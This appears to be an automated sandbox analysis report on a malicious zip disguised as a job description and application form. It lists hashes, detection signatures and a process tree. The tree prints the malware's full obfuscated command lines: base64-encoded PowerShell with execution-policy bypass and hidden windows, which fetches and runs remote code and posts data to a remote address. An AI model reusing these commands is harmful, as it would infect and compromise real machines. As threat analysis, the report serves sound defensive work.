Edit tour
Windows
Analysis Report
JD & Application Form_A (910).zip
Overview
General Information
| Sample name: | JD & Application Form_A (910).zip |
| Analysis ID: | 1555847 |
| MD5: | 9079ed3115f37010bb6af5be1e6df3cd |
| SHA1: | 4aada5d2b4be17270cb5ad406fdb7611885cb4e9 |
| SHA256: | c005f548ddfa7ba3ff9eb24afdf27e00b5e1ca2f0848e41cd0b7ed241bb66c3f |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for dropped file
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: PowerShell Base64 Encoded WMI Classes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Yara detected Obfuscated Powershell
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64_ra
rundll32.exe (PID: 6388 cmdline: C:\Windows \System32\ rundll32.e xe C:\Wind ows\System 32\shell32 .dll,SHCre ateLocalSe rverRunDll {9aa46009 -3ce0-458a -a354-7156 10a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
cmd.exe (PID: 6724 cmdline: "C:\Window s\system32 \cmd.exe" /v /k "STa ^R^T /M^i^ n "" po^We ^r^sH^E^Ll -No^L^o^G O -No^p -e ^p b^y^pA^ sS -en^c^o dEdc^O^M^M A^nd "UwB0 AGEAcgB0AC 0AUAByAG8A YwBlAHMAcw AgAHAAbwB3 AGUAcgBzAG gAZQBsAGwA IAAtAFcAaQ BuAGQAbwB3 AFMAdAB5AG wAZQAgAGgA aQBkAGQAZQ BuACAALQBB AHIAZwB1AG 0AZQBuAHQA TABpAHMAdA AgACIALQBX AGkAbgBkAG 8AdwBTAHQA eQBsAGUAIA BIAGkAZABk AGUAbgAiAC wAIAAiAC0A TgBvAEwAbw BnAG8AIgAs ACAAIgAtAE 4AbwBQAHIA bwBmAGkAbA BlACIALAAg ACIALQBFAH gAZQBjAHUA dABpAG8Abg BQAG8AbABp AGMAeQAgAE IAeQBwAGEA cwBzACIALA AgACIALQBF AG4AYwBvAG QAZQBkAEMA bwBtAG0AYQ BuAGQAIABT AFEAQgBGAE EARgBnAEEA SQBBAEEAbw BBAEYAcwBB AFYAQQBCAG wAQQBIAGcA QQBkAEEAQQ B1AEEARQBV AEEAVABnAE IAagBBAEUA OABBAFoAQQ BCAEoAQQBH ADQAQQBaAH cAQgBkAEEA RABvAEEATw BnAEIAVgBB AEYAUQBBAF IAZwBBADQA QQBDADQAQQ BSAHcAQgBG AEEASABRAE EAVQB3AEIA MABBAEYASQ BBAFMAUQBC AHUAQQBHAG MAQQBLAEEA QQBvAEEARw BrAEEAVgB3 AEIAeQBBAE MAQQBBAEsA QQBCAGIAQQ BGAE0AQQBl AFEAQgB6AE EASABRAEEA WgBRAEIAdA BBAEMANABB AFYAQQBCAG wAQQBIAGcA QQBkAEEAQQ B1AEEARQBV AEEAYgBnAE IAagBBAEcA OABBAFoAQQ BCAHAAQQBH ADQAQQBaAH cAQgBkAEEA RABvAEEATw BnAEIAVgBB AEYAUQBBAF IAZwBBADQA QQBDADQAQQ BSAHcAQgBs AEEASABRAE EAVQB3AEIA MABBAEgASQ BBAGEAUQBC AHUAQQBHAG MAQQBLAEEA QgBiAEEARQ BNAEEAYgB3 AEIAdQBBAE gAWQBBAFoA UQBCAHkAQQ BIAFEAQQBY AFEAQQA2AE EARABvAEEA UgBnAEIAeQ BBAEcAOABB AGIAUQBCAE MAQQBHAEUA QQBjAHcAQg BsAEEARABZ AEEATgBBAE IAVABBAEgA UQBBAGMAZw BCAHAAQQBH ADQAQQBaAH cAQQBvAEEA QwBJAEEAWQ BRAEIASQBB AEYASQBBAE 0AQQBCAGoA QQBFAGcAQQ BUAFEAQQAy AEEARQB3AE EAZQBRAEEA NQBBAEcANA BBAFkAZwBC AFkAQQBGAE kAQQBhAEEA QgBhAEEARA BJAEEAVgBn AEIAMQBBAE YAawBBAE0A dwBCAHIAQQ BIAFUAQQBZ AGcAQQB5AE EARABVAEEA YwB3AEIAaA BBAEYAYwBB AE4AUQBCAH MAQQBFAHcA QQBNAGcAQg BPAEEARwBF AEEAWQBnAE IARQBBAEUA MABBAFAAUQ BBAGkAQQBD AGsAQQBLAF EAQQBwAEEA QwBrAEEATA BnAEIARABB AEcAOABBAF QAZwBCAFUA QQBFAFUAQQ BUAGcAQgAw AEEAQwBrAE EASwBRAEEA PQAiAA=="" && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6976 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7028 cmdline: poWersHELl -NoLoGO -Nop -ep b ypAsS -enc odEdcOMMAn d "UwB0AGE AcgB0AC0AU AByAG8AYwB lAHMAcwAgA HAAbwB3AGU AcgBzAGgAZ QBsAGwAIAA tAFcAaQBuA GQAbwB3AFM AdAB5AGwAZ QAgAGgAaQB kAGQAZQBuA CAALQBBAHI AZwB1AG0AZ QBuAHQATAB pAHMAdAAgA CIALQBXAGk AbgBkAG8Ad wBTAHQAeQB sAGUAIABIA GkAZABkAGU AbgAiACwAI AAiAC0ATgB vAEwAbwBnA G8AIgAsACA AIgAtAE4Ab wBQAHIAbwB mAGkAbABlA CIALAAgACI ALQBFAHgAZ QBjAHUAdAB pAG8AbgBQA G8AbABpAGM AeQAgAEIAe QBwAGEAcwB zACIALAAgA CIALQBFAG4 AYwBvAGQAZ QBkAEMAbwB tAG0AYQBuA GQAIABTAFE AQgBGAEEAR gBnAEEASQB BAEEAbwBBA EYAcwBBAFY AQQBCAGwAQ QBIAGcAQQB kAEEAQQB1A EEARQBVAEE AVABnAEIAa gBBAEUAOAB BAFoAQQBCA EoAQQBHADQ AQQBaAHcAQ gBkAEEARAB vAEEATwBnA EIAVgBBAEY AUQBBAFIAZ wBBADQAQQB DADQAQQBSA HcAQgBGAEE ASABRAEEAV QB3AEIAMAB BAEYASQBBA FMAUQBCAHU AQQBHAGMAQ QBLAEEAQQB vAEEARwBrA EEAVgB3AEI AeQBBAEMAQ QBBAEsAQQB CAGIAQQBGA E0AQQBlAFE AQgB6AEEAS ABRAEEAWgB RAEIAdABBA EMANABBAFY AQQBCAGwAQ QBIAGcAQQB kAEEAQQB1A EEARQBVAEE AYgBnAEIAa gBBAEcAOAB BAFoAQQBCA HAAQQBHADQ AQQBaAHcAQ gBkAEEARAB vAEEATwBnA EIAVgBBAEY AUQBBAFIAZ wBBADQAQQB DADQAQQBSA HcAQgBsAEE ASABRAEEAV QB3AEIAMAB BAEgASQBBA GEAUQBCAHU AQQBHAGMAQ QBLAEEAQgB iAEEARQBNA EEAYgB3AEI AdQBBAEgAW QBBAFoAUQB CAHkAQQBIA FEAQQBYAFE AQQA2AEEAR ABvAEEAUgB nAEIAeQBBA EcAOABBAGI AUQBCAEMAQ QBHAEUAQQB jAHcAQgBsA EEARABZAEE ATgBBAEIAV ABBAEgAUQB BAGMAZwBCA HAAQQBHADQ AQQBaAHcAQ QBvAEEAQwB JAEEAWQBRA EIASQBBAEY ASQBBAE0AQ QBCAGoAQQB FAGcAQQBUA FEAQQAyAEE ARQB3AEEAZ QBRAEEANQB BAEcANABBA FkAZwBCAFk AQQBGAEkAQ QBhAEEAQgB hAEEARABJA EEAVgBnAEI AMQBBAEYAa wBBAE0AdwB CAHIAQQBIA FUAQQBZAGc AQQB5AEEAR ABVAEEAYwB 3AEIAaABBA EYAYwBBAE4 AUQBCAHMAQ QBFAHcAQQB NAGcAQgBPA EEARwBFAEE AWQBnAEIAR QBBAEUAMAB BAFAAUQBBA GkAQQBDAGs AQQBLAFEAQ QBwAEEAQwB rAEEATABnA EIARABBAEc AOABBAFQAZ wBCAFUAQQB FAFUAQQBUA GcAQgAwAEE AQwBrAEEAS wBRAEEAPQA iAA==" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7024 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6468 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le Hidden -NoLogo -N oProfile - ExecutionP olicy Bypa ss -Encode dCommand S QBFAFgAIAA oAFsAVABlA HgAdAAuAEU ATgBjAE8AZ ABJAG4AZwB dADoAOgBVA FQARgA4AC4 ARwBFAHQAU wB0AFIASQB uAGcAKAAoA GkAVwByACA AKABbAFMAe QBzAHQAZQB tAC4AVABlA HgAdAAuAEU AbgBjAG8AZ ABpAG4AZwB dADoAOgBVA FQARgA4AC4 ARwBlAHQAU wB0AHIAaQB uAGcAKABbA EMAbwBuAHY AZQByAHQAX QA6ADoARgB yAG8AbQBCA GEAcwBlADY ANABTAHQAc gBpAG4AZwA oACIAYQBIA FIAMABjAEg ATQA2AEwAe QA5AG4AYgB YAFIAaABaA DIAVgB1AFk AMwBrAHUAY gAyADUAcwB hAFcANQBsA EwAMgBOAGE AYgBEAE0AP QAiACkAKQA pACkALgBDA G8ATgBUAEU ATgB0ACkAK QA= MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6484 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
csc.exe (PID: 6928 cmdline: "C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\23vlt4 we.cmdline " MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 5944 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES250C.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC 881181D26A D458BA4326 BF7DFDA6F5 .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - powershell.exe (PID: 5736 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Version 5 .1 -s -NoL ogo -NoPro file MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6380 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
Acrobat.exe (PID: 640 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ Facebook_A dvertiser_ Position_D escription .pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) 
AcroCEF.exe (PID: 3572 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 4112 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=17 84 --field -trial-han dle=1620,i ,101416111 4905579021 ,119061474 7377714219 0,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - cmd.exe (PID: 1820 cmdline:
"C:\Window s\system32 \cmd.exe" /c start / min "" pow ershell.ex e -WindowS tyle hidde n -NoLogo -NoProfile -Executio nPolicy by pass -Enco dedCommand JAB1AHIAa QAgAD0AIAA iAGgAdAB0A HAAcwA6AC8 ALwBnAG0Ad ABhAGcAZQB uAGMAeQAuA G8AbgBsAGk AbgBlAC8AZ gBpAGwAZQA yAC8AMwAxA GMAMwBjADU AZAA4ADUAN QBjADAAYgB iADcAZQBlA DQANQBiADY AYgBlAGQAN gBjAGUANAB hAGUAOQAzA DAANABiADA AZgBkAGEAZ AA5AGYAOAA wAGQANQA3A DgAYQBjAGE AMQAxADcAO AAzAGUAYwA xADkAMgAzA GQAOQA4ADU AZgA4AGIAM wBjADcAYwA 1AGUAZAAwA DIANgA0ADE AZgBmAGQAM wBlADAAMQB iADQAOQBlA DAAZQAzADU AYQAyADYAZ AAyAGMANQB hADYAMwAzA GIANAAyADM ANgA0ADEAN gA3AGEAMgA 3ADgAMgBlA GUANwBhAGM AMQBjAGMAZ gA4AGMAYgA 2AGEANAA0A GEAYQAyAGQ AOQAxAGEAN gA0AGEANwA xADEANABjA DYANwBiADU AMQA5AGEAN QAzADgAYgA 4AGQAMQA2A DcANAA1ADI AZAAzAGIAN gBkADQAZgB lADIANgBmA DAAMQBhADM AOAA5AGUAZ AAxADYAZgB kADQAZAA2A DUAZgBmADQ ANgAyADMAO ABkAGIAYgA zAGEAOAA2A GUAMwBhADE ANwA1ADIAZ AA0ADkAMgA 0ACIAOwANA AoAJABjAG8 AdQBuAHQAI AA9ACAAMQA wADAAOwANA AoADQAKAA0 ACgANAAoAZ gB1AG4AYwB 0AGkAbwBuA CAAUwBlAG4 AZAAgAHsAD QAKACAAIAA gACAAcABhA HIAYQBtACg AIABbAFAAU wBPAGIAagB lAGMAdABdA CAAJABsAG8 AZwBNAHMAZ wAgACkADQA KAA0ACgAgA CAAIAAgACM AIABDAG8Ab gB2AGUAcgB 0ACAAYgBvA GQAeQAgAHQ AbwAgAHMAd AByAGkAbgB nAA0ACgAgA CAAIAAgACQ AcwB0AHIAa QBuAGcAQgB vAGQAeQAgA D0AIABbAHM AdAByAGkAb gBnAF0AKAA kAGwAbwBnA E0AcwBnACA AfAAgAEMAb wBuAHYAZQB yAHQAVABvA C0ASgBzAG8 AbgApADsAD QAKACAAIAA gACAAJABsA G8AZwBNAGU AcwBzAGEAZ wBlAHMAIAA 9ACAAQAAoA CkAOwANAAo AIAAgACAAI AAkAGwAbwB nAE0AZQBzA HMAYQBnAGU AcwAgACsAP QAgACQAcwB 0AHIAaQBuA GcAQgBvAGQ AeQA7AA0AC gAgACAAIAA gACQAbABvA GcATQBlAHM AcwBhAGcAZ QBzACAAKwA 9ACAAIgAtA C0ALQAtAC0 ALQAtAC0AL QAtACIAOwA NAAoADQAKA CAAIAAgACA AJABoAGUAY QBkAGUAcgB zACAAPQAgA EAAewB9ADs ADQAKACAAI AAgACAAJAB rAGUAeQAgA D0AIAAiAEM AbwBuAHQAZ QBuAHQALQB UAHkAcABlA CIAOwANAAo AIAAgACAAI AAkAHYAYQB sAHUAZQAgA D0AIAAiAGE AcABwAGwAa QBjAGEAdAB pAG8AbgAvA GoAcwBvAG4 AIgA7AA0AC gANAAoAIAA gACAAIAAkA GgAZQBhAGQ AZQByAHMAW wAkAGsAZQB 5AF0AIAA9A CAAJAB2AGE AbAB1AGUAO wANAAoAIAA gACAAIAAkA HUAcgBpACA APQAgACIAT ABPAEcAVQB SAEwAIgA7A A0ACgAgACA AIAAgAHQAc gB5AA0ACgA gACAAIAAgA CAAIAAgACA AewANAAoAI AAgACAAIAA gACAAIAAgA CAAIAAgACA AJABiAG8AZ AB5ACAAPQA gACQAbABvA GcATQBlAHM AcwBhAGcAZ QBzACAAfAA gAEMAbwBuA HYAZQByAHQ AVABvAC0AS gBzAG8AbgA 7AA0ACgAgA CAAIAAgACA AIAAgACAAI AAgACAAIAB JAG4AdgBvA GsAZQAtAFc AZQBiAFIAZ QBxAHUAZQB zAHQAIAAtA FUAcgBpACA AJAB1AHIAa QAgAC0ATQB lAHQAaABvA GQAIABQAG8 AcwB0ACAAL QBIAGUAYQB kAGUAcgBzA CAAJABoAGU AYQBkAGUAc gBzACAALQB CAG8AZAB5A CAAJABiAG8 AZAB5AA0AC gAgACAAIAA gACAAIAAgA CAAfQANAAo AIAAgACAAI AAgACAAIAA gAGMAYQB0A GMAaAB7AA0 ACgAgACAAI AAgACAAIAA gACAAIAAgA CAAIAANAAo AIAAgACAAI AAgACAAIAA